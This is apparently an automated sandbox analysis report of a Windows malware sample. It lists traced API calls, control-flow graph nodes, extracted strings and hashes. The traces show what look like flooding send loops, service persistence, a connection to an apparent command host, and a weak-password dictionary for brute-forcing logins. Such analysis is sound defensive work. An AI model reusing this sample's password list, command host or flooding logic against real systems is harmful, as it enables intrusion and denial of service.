                                • 6CFC6DE0.KERNEL32(00000000), ref: 004056F2
                                • LoadLibraryA.KERNEL32(KERNEL32.dll,Get), ref: 0040574A
                                • 6CFC6DE0.KERNEL32(00000000), ref: 0040574D
                                • LoadLibraryA.KERNEL32(KERNEL32.dll,?), ref: 0040578A
                                • 6CFC6DE0.KERNEL32(00000000), ref: 0040578D
                                • exit.MSVCRT ref: 004057A7
                                • wsprintfA.USER32 ref: 004057D2
                                • CreateThread.KERNEL32(00000000,00000000,Function_00002DD5,00000000,00000000,00000000), ref: 004057FF
                                • Sleep.KERNEL32(000001F4), ref: 00405806
                                • WSAStartup.WS2_32(00000202,?), ref: 0040581E
                                • CreateThread.KERNEL32(00000000,00000000,Function_00005182,00000000,00000000,00000000), ref: 0040582A
                                • WSAStartup.WS2_32(00000202,?), ref: 00405838
                                • CreateThread.KERNEL32(00000000,00000000,Function_000051E3,00000000,00000000,00000000), ref: 00405844
                                • WaitForSingleObject.KERNEL32(00000000,000000FF,Function_0000387C,00000000), ref: 00405859
                                • CloseHandle.KERNEL32 ref: 00405865
                                • Sleep.KERNEL32(0000012C), ref: 00405883
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1383419813.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.1383397827.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                • Associated: 00000002.00000002.1383419813.000000000040B000.00000040.00000001.01000000.00000005.sdmp
                                • Associated: 00000002.00000002.1383468637.000000000040C000.00000080.00000001.01000000.00000005.sdmp
                                • Associated: 00000002.00000002.1383520946.000000000040D000.00000004.00000001.01000000.00000005.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: LibraryLoad$CreateSleepThread$Startup$CloseHandleObjectSingleWaitexitwsprintf
                                • String ID: A$ADVAPI32.dll$C$C$Defghi Klmnopqr Tuv$E$G$Get$I$KERNEL32.dll$L$M$RegisterServiceCtrlHandlerA$SetServiceStatus$T$WS2_32.dll$a$a$a$closesocket$d$d$e$e$e$e$e$e$h$hra%u.dll$n$o$r$r$r$r$r$r$r$s$t$t$t$t$t$u$u$x
                                • API String ID: 434866226-3768298475
                                • Opcode ID: 3e8986f7b36fc184894d738f56119a721a27f0aa9eb4948b4fdc8215cfafe1d1
                                • Instruction ID: 2b90b7f98aae210445e73ef680a1d9401666750c7211a7faab133c9ec65b4e0f
                                • Opcode Fuzzy Hash: 3e8986f7b36fc184894d738f56119a721a27f0aa9eb4948b4fdc8215cfafe1d1
                                • Instruction Fuzzy Hash: F3913670C082C8EDEB11D7A8DD4CBDEBFB99B15348F0440A9E54476292C7BD5A48CB7A

                                Control-flow Graph

                                APIs
                                • LoadLibraryA.KERNEL32(ADVAPI32.dll,RegQueryValueExA), ref: 00405365
                                • 6CFC6DE0.KERNEL32(00000000), ref: 0040536E
                                • LoadLibraryA.KERNEL32(ADVAPI32.dll,RegCloseKey), ref: 00405379
                                • 6CFC6DE0.KERNEL32(00000000), ref: 0040537C
                                • LoadLibraryA.KERNEL32(KERNEL32.dll,lstrcpyA), ref: 0040538B
                                • 6CFC6DE0.KERNEL32(00000000), ref: 0040538E
                                • LoadLibraryA.KERNEL32(KERNEL32.dll,lstrcatA), ref: 0040539D
                                • 6CFC6DE0.KERNEL32(00000000), ref: 004053A0
                                • memset.MSVCRT ref: 00405483
                                • GetFileSize.KERNEL32(00000000,00000000), ref: 0040550C
                                • GlobalAlloc.KERNEL32(00000040,00000000), ref: 0040551C
                                • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00405533
                                • GlobalFree.KERNEL32(?), ref: 00405540
                                • CloseHandle.KERNEL32(00000000), ref: 00405547
                                • CloseHandle.KERNEL32(00000000), ref: 00405552
                                • BeginUpdateResourceA.KERNEL32(?,00000000), ref: 0040555C
                                • UpdateResourceA.KERNEL32(00000000,0000000A,00000066,00000000,?,?), ref: 0040557B
                                • lstrlen.KERNEL32(Defghi Klmnopqr Tuv), ref: 00405585
                                • UpdateResourceA.KERNEL32(?,0000000A,00000065,00000000,Defghi Klmnopqr Tuv,00000001), ref: 00405596
                                • EndUpdateResourceA.KERNEL32(?,00000000), ref: 0040559F
                                • GlobalFree.KERNEL32(?), ref: 004055AF
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1383419813.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.1383397827.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                • Associated: 00000002.00000002.1383419813.000000000040B000.00000040.00000001.01000000.00000005.sdmp
                                • Associated: 00000002.00000002.1383468637.000000000040C000.00000080.00000001.01000000.00000005.sdmp
                                • Associated: 00000002.00000002.1383520946.000000000040D000.00000004.00000001.01000000.00000005.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: LibraryLoadResourceUpdate$Global$CloseFileFreeHandle$AllocBeginReadSizelstrlenmemset
                                • String ID: ADVAPI32.dll$C$C$Defghi Klmnopqr Tuv$E$ImagePath$KERNEL32.dll$KERNEL32.dll$M$RegCloseKey$RegQueryValueExA$S$S$S$S$T$Y$\$\$\$c$e$e$e$e$i$l$lstrcatA$lstrcpyA$n$n$o$o$r$r$r$r$s$t$t$t$u$v
                                • API String ID: 78893175-1497069993
                                • Opcode ID: a172b0cc63db696c841bbe02ffd43a2cf52db66c145518108a5dfe1ce22702be
                                • Instruction ID: 857f389ec30b06542d6cc4631e69be42d6d6ae2a8b7d483b04e891210c00ca0b
                                • Opcode Fuzzy Hash: a172b0cc63db696c841bbe02ffd43a2cf52db66c145518108a5dfe1ce22702be
                                • Instruction Fuzzy Hash: 14816070D042C8EEEF119BA4DC48BEFBEB99F15344F040065F544B62A1D7B94A48CB79

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 750 402dd5-402f90 call 402a59 753 402f96-402fc2 gethostname 750->753 754 4030f8-4030fa 750->754 755 402fc8-402fdc gethostbyname 753->755 756 4030ed-4030f7 WSACleanup 753->756 755->756 757 402fe2-402fe4 755->757 756->754 758 402fe7-402fed 757->758 758->756 759 402ff3-403035 memset memcpy 758->759 760 403036-40307f memset sprintf 759->760 761 403081 760->761 762 4030cb-4030db 760->762 764 403084-40308b 761->764 762->760 763 4030e1-4030e8 762->763 763->758 765 4030c4-4030c9 764->765 766 40308d 764->766 765->762 765->764 767 403093-4030a5 Sleep 766->767 768 4030c1 767->768 769 4030a7-4030bf call 402ad0 767->769 768->765 769->767 769->768
                                APIs
                                  • Part of subcall function 00402A59: WSAStartup.WS2_32(00000202,?), ref: 00402A6E
                                • gethostname.WS2_32(?,00000080), ref: 00402FBA
                                • gethostbyname.WS2_32(?), ref: 00402FCF
                                • memset.MSVCRT ref: 00402FFA
                                • memcpy.MSVCRT(?,00000000,?,?,00000000,00000010), ref: 0040300E
                                • memset.MSVCRT ref: 00403049
                                • sprintf.MSVCRT ref: 0040306F
                                • Sleep.KERNEL32(000000C8), ref: 00403098
                                • WSACleanup.WS2_32 ref: 004030ED
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1383419813.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000002.00000002.1383397827.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                 • Associated: 00000002.00000002.1383419813.000000000040B000.00000040.00000001.01000000.00000005.sdmp
                                 • Associated: 00000002.00000002.1383468637.000000000040C000.00000080.00000001.01000000.00000005.sdmp
                                 • Associated: 00000002.00000002.1383520946.000000000040D000.00000004.00000001.01000000.00000005.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: memset$CleanupSleepStartupgethostbynamegethostnamememcpysprintf
                                • String ID: %d.%d.%d.%d$111$123$123$123456$12345678$1314520$5201314$88888$NULL$abc123$admin$administrator$alex$alex$angel$asdf$asdfgh$baby$bbbbbb$caonima$enter$game$guest$hack$home$home$love$love$memory$money$movie$movie$password$qwerty$root$root$test$test$time$user$woaini$xpuser$yeah
                                • API String ID: 2657193355-195746125
                                • Opcode ID: 771db627bcd87f4cf892667a07cceb416aea59b5bf69d6e00a526e4c638fa208
                                • Instruction ID: ae78371e899d60bf5f5d828a76061139e061b110f9393b7dc49d63d24438a906
                                • Opcode Fuzzy Hash: 771db627bcd87f4cf892667a07cceb416aea59b5bf69d6e00a526e4c638fa208
                                • Instruction Fuzzy Hash: 3C81FAB2D012599BDB21DF95C9486DEBBB4BB05308F50C0BBD5497B2A1C7B84B88CF58
                                APIs
                                • LoadLibraryA.KERNEL32(WS2_32.dll,htons), ref: 00406DCA
                                • 6CFC6DE0.KERNEL32(00000000), ref: 00406DD3
                                • LoadLibraryA.KERNEL32(WS2_32.dll,setsockopt), ref: 00406DE1
                                • 6CFC6DE0.KERNEL32(00000000), ref: 00406DE4
                                  • Part of subcall function 00406BD0: LoadLibraryA.KERNEL32(KERNEL32.dll,GetTickCount,Defghi Klmnopqr Tuv,00403CEF,0000001A), ref: 00406BDB
                                  • Part of subcall function 00406BD0: 6CFC6DE0.KERNEL32(00000000), ref: 00406BE2
                                  • Part of subcall function 00406C10: LoadLibraryA.KERNEL32(WS2_32.dll,gethostbyname,?,00401454,0040345F,00401454), ref: 00406C1C
                                  • Part of subcall function 00406C10: 6CFC6DE0.KERNEL32(00000000), ref: 00406C23
                                  • Part of subcall function 00406C10: inet_addr.WS2_32(?), ref: 00406C30
                                • socket.WS2_32(00000002,00000002,00000000), ref: 00406E79
                                • sendto.WS2_32(00000000,?,-00000401,00000000,?,00000010), ref: 00406EC6
                                • Sleep.KERNEL32(00000014), ref: 00406ECD
                                • RtlExitUserThread.NTDLL(00000000), ref: 00406EDE
                                • LoadLibraryA.KERNEL32(WS2_32.dll,closesocket), ref: 00406F0A
                                • 6CFC6DE0.KERNEL32(00000000), ref: 00406F13
                                • LoadLibraryA.KERNEL32(WS2_32.dll,htons), ref: 00406F21
                                • 6CFC6DE0.KERNEL32(00000000), ref: 00406F24
                                • LoadLibraryA.KERNEL32(WS2_32.dll,WSAStartup), ref: 00406F32
                                • 6CFC6DE0.KERNEL32(00000000), ref: 00406F35
                                • socket.WS2_32(00000002,00000001,00000006), ref: 00406F97
                                • connect.WS2_32(00000000,?,00000010), ref: 00406FA7
                                • send.WS2_32(00000000,?,00000800,00000000), ref: 0040702E
                                • Sleep.KERNEL32(0000000A), ref: 00407032
                                • RtlExitUserThread.NTDLL(00000000), ref: 0040703B
                                • LoadLibraryA.KERNEL32(KERNEL32.dll,GetTickCount,761E58A0,00000000,00000000,76F90F00), ref: 0040706E
                                • 6CFC6DE0.KERNEL32(00000000), ref: 00407077
                                • LoadLibraryA.KERNEL32(WS2_32.dll,WSAStartup), ref: 00407087
                                • 6CFC6DE0.KERNEL32(00000000), ref: 0040708A
                                • LoadLibraryA.KERNEL32(WS2_32.dll,WSASocketA), ref: 00407098
                                • 6CFC6DE0.KERNEL32(00000000), ref: 0040709B
                                • sendto.WS2_32(00000000,?,0000100C,00000000,?,00000010), ref: 004071A3
                                • RtlExitUserThread.NTDLL(00000000), ref: 004071AB
                                • Sleep.KERNEL32(000001F4), ref: 00407210
                                • RtlExitUserThread.NTDLL(00000000,?,00000000), ref: 00407216
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1383419813.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000002.00000002.1383397827.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                 • Associated: 00000002.00000002.1383419813.000000000040B000.00000040.00000001.01000000.00000005.sdmp
                                 • Associated: 00000002.00000002.1383468637.000000000040C000.00000080.00000001.01000000.00000005.sdmp
                                 • Associated: 00000002.00000002.1383520946.000000000040D000.00000004.00000001.01000000.00000005.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: LibraryLoad$ExitThreadUser$Sleep$sendtosocket$connectinet_addrsend
                                • String ID: GetTickCount$KERNEL32.dll$WS2_32.dll$WSASocketA$WSAStartup$closesocket$htons$setsockopt
                                • API String ID: 1875766515-3926040945
                                • Opcode ID: ca39cd4000dd52fb1d9514fc1105b4bdf8d10fdaecb33af4158a9940e6cff011
                                • Instruction ID: 108494642a65384e92ce671c93e0be5eb4aeb19d0da13a5ceb95eb50e5242d09
                                • Opcode Fuzzy Hash: ca39cd4000dd52fb1d9514fc1105b4bdf8d10fdaecb33af4158a9940e6cff011
                                • Instruction Fuzzy Hash: 6BB118716483446BE314EB64DC05FAF77E5EBC9704F01093EF645BB2D0DAB89904879A
                                APIs
                                • LoadLibraryA.KERNEL32(WS2_32.dll,gethostbyname), ref: 0040816D
                                • 6CFC6DE0.KERNEL32(00000000), ref: 00408176
                                • LoadLibraryA.KERNEL32(WS2_32.dll,htons), ref: 00408185
                                • 6CFC6DE0.KERNEL32(00000000), ref: 00408188
                                • LoadLibraryA.KERNEL32(WS2_32.dll,setsockopt), ref: 0040819A
                                • 6CFC6DE0.KERNEL32(00000000), ref: 0040819D
                                • LoadLibraryA.KERNEL32(WS2_32.dll,WSAStartup), ref: 004081AC
                                • 6CFC6DE0.KERNEL32(00000000), ref: 004081AF
                                • LoadLibraryA.KERNEL32(WS2_32.dll,closesocket), ref: 004081BE
                                • 6CFC6DE0.KERNEL32(00000000), ref: 004081C1
                                • LoadLibraryA.KERNEL32(WS2_32.dll,WSASocketA), ref: 004081D3
                                • 6CFC6DE0.KERNEL32(00000000), ref: 004081D6
                                • LoadLibraryA.KERNEL32(WS2_32.dll,gethostname), ref: 004081E5
                                • 6CFC6DE0.KERNEL32(00000000), ref: 004081E8
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1383419813.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000002.00000002.1383397827.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                 • Associated: 00000002.00000002.1383419813.000000000040B000.00000040.00000001.01000000.00000005.sdmp
                                 • Associated: 00000002.00000002.1383468637.000000000040C000.00000080.00000001.01000000.00000005.sdmp
                                 • Associated: 00000002.00000002.1383520946.000000000040D000.00000004.00000001.01000000.00000005.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: LibraryLoad
                                • String ID: %d.%d.%d.%d$($E$P$WS2_32.dll$WSASocketA$WSAStartup$closesocket$gethostbyname$gethostname$htons$setsockopt
                                • API String ID: 1029625771-3688028543
                                • Opcode ID: d5bec2df0a0943f906bf46e4146bb6c47795ba2453832fb3d4d13fc28c77d11d
                                • Instruction ID: 53d6d929515b9e91ab4b685de5499f61474fe8fa857c4809401ddf33aa41e7a7
                                • Opcode Fuzzy Hash: d5bec2df0a0943f906bf46e4146bb6c47795ba2453832fb3d4d13fc28c77d11d
                                • Instruction Fuzzy Hash: A1D16EB5D402699BDB20DBA4CD89FEDB7B5EF94304F0040AEE249B7290DBB459C08F59
                                APIs
                                • LoadLibraryA.KERNEL32(KERNEL32.dll,GetSystemDirectoryA), ref: 00406C6A
                                • 6CFC6DE0.KERNEL32(00000000), ref: 00406C73
                                • LoadLibraryA.KERNEL32(KERNEL32.dll,lstrcatA), ref: 00406C81
                                • 6CFC6DE0.KERNEL32(00000000), ref: 00406C84
                                • LoadLibraryA.KERNEL32(KERNEL32.dll,lstrcpyA), ref: 00406C92
                                • 6CFC6DE0.KERNEL32(00000000), ref: 00406C95
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1383419813.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000002.00000002.1383397827.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                 • Associated: 00000002.00000002.1383419813.000000000040B000.00000040.00000001.01000000.00000005.sdmp
                                 • Associated: 00000002.00000002.1383468637.000000000040C000.00000080.00000001.01000000.00000005.sdmp
                                 • Associated: 00000002.00000002.1383520946.000000000040D000.00000004.00000001.01000000.00000005.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: LibraryLoad
                                • String ID: $ $.$E$F$GetSystemDirectoryA$I$KERNEL32.dll$P$\$\$\$a$g$i$i$lstrcatA$lstrcpyA$m$n$n$o$o$o$p$p$s
                                • API String ID: 1029625771-3412716298
                                • Opcode ID: 8249b312c4c04751acff0aaaeb5fd0c636e29cc8b9147592e794b1a22bdd32d1
                                • Instruction ID: 1cc97e3852dfcfcdc61d028ea0c2383468fb858139331ce9ede19e0ea5d9e28d
                                • Opcode Fuzzy Hash: 8249b312c4c04751acff0aaaeb5fd0c636e29cc8b9147592e794b1a22bdd32d1
                                • Instruction Fuzzy Hash: 0041E61114D3C19DE312DA799884A8FBFD55BB6608F481D9EF1C427293C2AAC64CC7BB
                                APIs
                                • LoadLibraryA.KERNEL32(WS2_32.dll,htons), ref: 00403389
                                • 6CFC6DE0.KERNEL32(00000000), ref: 00403392
                                • LoadLibraryA.KERNEL32(WS2_32.dll,closesocket), ref: 0040339D
                                • 6CFC6DE0.KERNEL32(00000000), ref: 004033A0
                                • _mbscpy.MSVCRT(?,00000000,EhETHRcLHRAXHREQEAkLEwsTQw==), ref: 004033CF
                                • strstr.MSVCRT ref: 004033E0
                                • memset.MSVCRT ref: 004033F9
                                • strcspn.MSVCRT ref: 00403410
                                • strncpy.MSVCRT ref: 0040341B
                                • strcspn.MSVCRT ref: 0040342D
                                • atoi.MSVCRT(?), ref: 00403437
                                • socket.WS2_32(00000002,00000001,00000000), ref: 00403468
                                • connect.WS2_32(00000000,00000002,00000010), ref: 00403477
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1383419813.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000002.00000002.1383397827.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                 • Associated: 00000002.00000002.1383419813.000000000040B000.00000040.00000001.01000000.00000005.sdmp
                                 • Associated: 00000002.00000002.1383468637.000000000040C000.00000080.00000001.01000000.00000005.sdmp
                                 • Associated: 00000002.00000002.1383520946.000000000040D000.00000004.00000001.01000000.00000005.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: LibraryLoadstrcspn$_mbscpyatoiconnectmemsetsocketstrncpystrstr
                                • String ID: EhETHRcLHRAXHREQEAkLEwsTQw==$WS2_32.dll$closesocket$htons
                                • API String ID: 2841553729-84791798
                                • Opcode ID: b0d02812e01bd494b323ff795dfcab75fceb7154f08fe877454a16fbfcbf3fe1
                                • Instruction ID: 6aa5ca56811b2828efdf987d7b23adbf84b4b011ef7c06a256cd014a8a3b1787
                                • Opcode Fuzzy Hash: b0d02812e01bd494b323ff795dfcab75fceb7154f08fe877454a16fbfcbf3fe1
                                • Instruction Fuzzy Hash: D931B871900218BBDB10ABB49D49FDF7A6CAF05314F104577F609F72E1DA785A448BA8
                                APIs
                                • LoadLibraryA.KERNEL32(ADVAPI32.dll,SetServiceStatus), ref: 00405898
                                • 6CFC6DE0.KERNEL32(00000000), ref: 0040589F
                                • Sleep.KERNEL32(000001F4), ref: 004058E2
                                • Sleep.KERNEL32(000001F4), ref: 00405926
                                • Sleep.KERNEL32(000001F4), ref: 00405961
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1383419813.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000002.00000002.1383397827.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                 • Associated: 00000002.00000002.1383419813.000000000040B000.00000040.00000001.01000000.00000005.sdmp
                                 • Associated: 00000002.00000002.1383468637.000000000040C000.00000080.00000001.01000000.00000005.sdmp
                                 • Associated: 00000002.00000002.1383520946.000000000040D000.00000004.00000001.01000000.00000005.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: Sleep$LibraryLoad
                                • String ID: ADVAPI32.dll$SetServiceStatus
                                • API String ID: 3235702935-1924299548
                                • Opcode ID: f244ac2fdfcf7e27f983d47bd2e476e1663f6f9b5c6e818040c90ec42e299550
                                • Instruction ID: a5c8a0c86872ce331e11fcaa3c45903c56c1e4641523fec5342e9324e04e0236
                                • Opcode Fuzzy Hash: f244ac2fdfcf7e27f983d47bd2e476e1663f6f9b5c6e818040c90ec42e299550
                                • Instruction Fuzzy Hash: 6A1158B1121262DBFB105B16EE4CB573AA6F704319F00803AE544B62B2C7B90C54CF3E
                                APIs
                                • WSAStartup.WS2_32(00000202), ref: 004050DB
                                • CreateThread.KERNEL32(00000000,00000000,Function_0000407C,00000000,00000000,00000000), ref: 004050ED
                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004050FB
                                • CloseHandle.KERNEL32 ref: 00405107
                                • closesocket.WS2_32 ref: 00405113
                                • Sleep.KERNEL32(0000012C), ref: 0040511E
                                Memory Dump Source
                                • Source File: 00000002.00000002.1383419813.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000002.00000002.1383397827.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                 • Associated: 00000002.00000002.1383419813.000000000040B000.00000040.00000001.01000000.00000005.sdmp
                                 • Associated: 00000002.00000002.1383468637.000000000040C000.00000080.00000001.01000000.00000005.sdmp
                                 • Associated: 00000002.00000002.1383520946.000000000040D000.00000004.00000001.01000000.00000005.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseCreateHandleObjectSingleSleepStartupThreadWaitclosesocket
                                • String ID:
                                • API String ID: 964154963-0
                                • Opcode ID: acdea17ffb6ebf0e0777ef3bef69c6420b85cc0412669cd5e548fff47d643c1f
                                • Instruction ID: a79ab9a2dfc38e3776cf33d79ac1821f4f8275b6afc8926fd1558f3327be2bb1
                                • Opcode Fuzzy Hash: acdea17ffb6ebf0e0777ef3bef69c6420b85cc0412669cd5e548fff47d643c1f
                                • Instruction Fuzzy Hash: CAE0C972406260FBD3216BA1AE4DDAB3E68FB0A3A1F144235F359B50F5DB340854CBA9
                                APIs
                                • WSAStartup.WS2_32(00000202), ref: 00405137
                                • CreateThread.KERNEL32(00000000,00000000,Function_000048AA,00000000,00000000,00000000), ref: 00405149
                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00405157
                                • CloseHandle.KERNEL32 ref: 00405163
                                • closesocket.WS2_32 ref: 0040516F
                                • Sleep.KERNEL32(0000012C), ref: 0040517A
                                Memory Dump Source
                                • Source File: 00000002.00000002.1383419813.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000002.00000002.1383397827.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                 • Associated: 00000002.00000002.1383419813.000000000040B000.00000040.00000001.01000000.00000005.sdmp
                                 • Associated: 00000002.00000002.1383468637.000000000040C000.00000080.00000001.01000000.00000005.sdmp
                                 • Associated: 00000002.00000002.1383520946.000000000040D000.00000004.00000001.01000000.00000005.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseCreateHandleObjectSingleSleepStartupThreadWaitclosesocket
                                • String ID:
                                • API String ID: 964154963-0
                                • Opcode ID: a1bc73832126a13e0e9c6a85bba279eae2266bbde8cda996510bb9685748afbe
                                • Instruction ID: 597c19437f16af45fe4c7fafc924f242b911babb52725cfa5b12b60dc2fdca2e
                                • Opcode Fuzzy Hash: a1bc73832126a13e0e9c6a85bba279eae2266bbde8cda996510bb9685748afbe
                                • Instruction Fuzzy Hash: D0E0C076406160BFD3216BA1EF4DD9B3E68EF0A361B044135F35AB44F5C6780454CBA9
                                APIs
                                • htons.WS2_32(00001F9A), ref: 00404861
                                  • Part of subcall function 00406C10: LoadLibraryA.KERNEL32(WS2_32.dll,gethostbyname,?,00401454,0040345F,00401454), ref: 00406C1C
                                  • Part of subcall function 00406C10: 6CFC6DE0.KERNEL32(00000000), ref: 00406C23
                                  • Part of subcall function 00406C10: inet_addr.WS2_32(?), ref: 00406C30
                                • socket.WS2_32(00000002,00000001,00000000), ref: 0040487F
                                • connect.WS2_32(00000000,00000002,00000010), ref: 0040488E
                                • closesocket.WS2_32(00000000), ref: 0040489A
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1383419813.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000002.00000002.1383397827.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                 • Associated: 00000002.00000002.1383419813.000000000040B000.00000040.00000001.01000000.00000005.sdmp
                                 • Associated: 00000002.00000002.1383468637.000000000040C000.00000080.00000001.01000000.00000005.sdmp
                                 • Associated: 00000002.00000002.1383520946.000000000040D000.00000004.00000001.01000000.00000005.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: LibraryLoadclosesocketconnecthtonsinet_addrsocket
                                • String ID: chinagov.8800.org
                                • API String ID: 2269069743-2288617695
                                • Opcode ID: 41718983f1c9e5c223780d873f69bff2d5abf28acc2154f537cf20909f978101
                                • Instruction ID: aa8867dea59f3e018d1c3fe77959f1df48631034d4a5c4a8dfe27a3f3de7d62f
                                • Opcode Fuzzy Hash: 41718983f1c9e5c223780d873f69bff2d5abf28acc2154f537cf20909f978101
                                • Instruction Fuzzy Hash: 5DF08235A002247AEB1067A49D0ABEE7668EF09764F104726F721BA1E1D7B84550879D
                                APIs
                                • LoadLibraryA.KERNEL32(WS2_32.dll,gethostbyname,?,00401454,0040345F,00401454), ref: 00406C1C
                                • 6CFC6DE0.KERNEL32(00000000), ref: 00406C23
                                • inet_addr.WS2_32(?), ref: 00406C30
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1383419813.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000002.00000002.1383397827.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                 • Associated: 00000002.00000002.1383419813.000000000040B000.00000040.00000001.01000000.00000005.sdmp
                                 • Associated: 00000002.00000002.1383468637.000000000040C000.00000080.00000001.01000000.00000005.sdmp
                                 • Associated: 00000002.00000002.1383520946.000000000040D000.00000004.00000001.01000000.00000005.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: LibraryLoadinet_addr
                                • String ID: WS2_32.dll$gethostbyname
                                • API String ID: 4063186387-1612545655
                                • Opcode ID: 681b35af2eda01de744f1b5af480ae26578f1e9ffe207a50f620d86b6acd63d2
                                • Instruction ID: fa684150f8c7a78303bc788c4e7da3796caaeb6c4f1dce52f515438040d0683d
                                • Opcode Fuzzy Hash: 681b35af2eda01de744f1b5af480ae26578f1e9ffe207a50f620d86b6acd63d2
                                • Instruction Fuzzy Hash: 2DE09A393042009BE3049B26FE48DAA3BE8DAC9722305407AF942E3260C334C8428A68
                                APIs
                                • LoadLibraryA.KERNEL32(KERNEL32.dll,GetTickCount,Defghi Klmnopqr Tuv,00403CEF,0000001A), ref: 00406BDB
                                • 6CFC6DE0.KERNEL32(00000000), ref: 00406BE2
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1383419813.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000002.00000002.1383397827.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                 • Associated: 00000002.00000002.1383419813.000000000040B000.00000040.00000001.01000000.00000005.sdmp
                                 • Associated: 00000002.00000002.1383468637.000000000040C000.00000080.00000001.01000000.00000005.sdmp
                                 • Associated: 00000002.00000002.1383520946.000000000040D000.00000004.00000001.01000000.00000005.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: LibraryLoad
                                • String ID: Defghi Klmnopqr Tuv$GetTickCount$KERNEL32.dll
                                • API String ID: 1029625771-1458725802
                                • Opcode ID: 6b3510431a1f1d43bc199626c34209ae12acd185543041aa9819738d571691f0
                                • Instruction ID: e2b8e24bfa267fa6e9ec36e760088df98f66f050865d098ef55141e691ac327e
                                • Opcode Fuzzy Hash: 6b3510431a1f1d43bc199626c34209ae12acd185543041aa9819738d571691f0
                                • Instruction Fuzzy Hash: 69D02272A802129BD30033BADF0FACA7AA99AC83553048037B084F24B4DF38C4404798
                                APIs
                                • WSAStartup.WS2_32(00000202,?), ref: 004051F9
                                • Sleep.KERNEL32(00000064), ref: 00405207
                                  • Part of subcall function 0040507D: time.MSVCRT(00000000), ref: 00405087
                                  • Part of subcall function 0040507D: localtime.MSVCRT(?), ref: 00405094
                                  • Part of subcall function 0040507D: wsprintfA.USER32 ref: 004050BD
                                • atoi.MSVCRT(?,?), ref: 0040521C
                                • Sleep.KERNEL32(00000064), ref: 0040522D
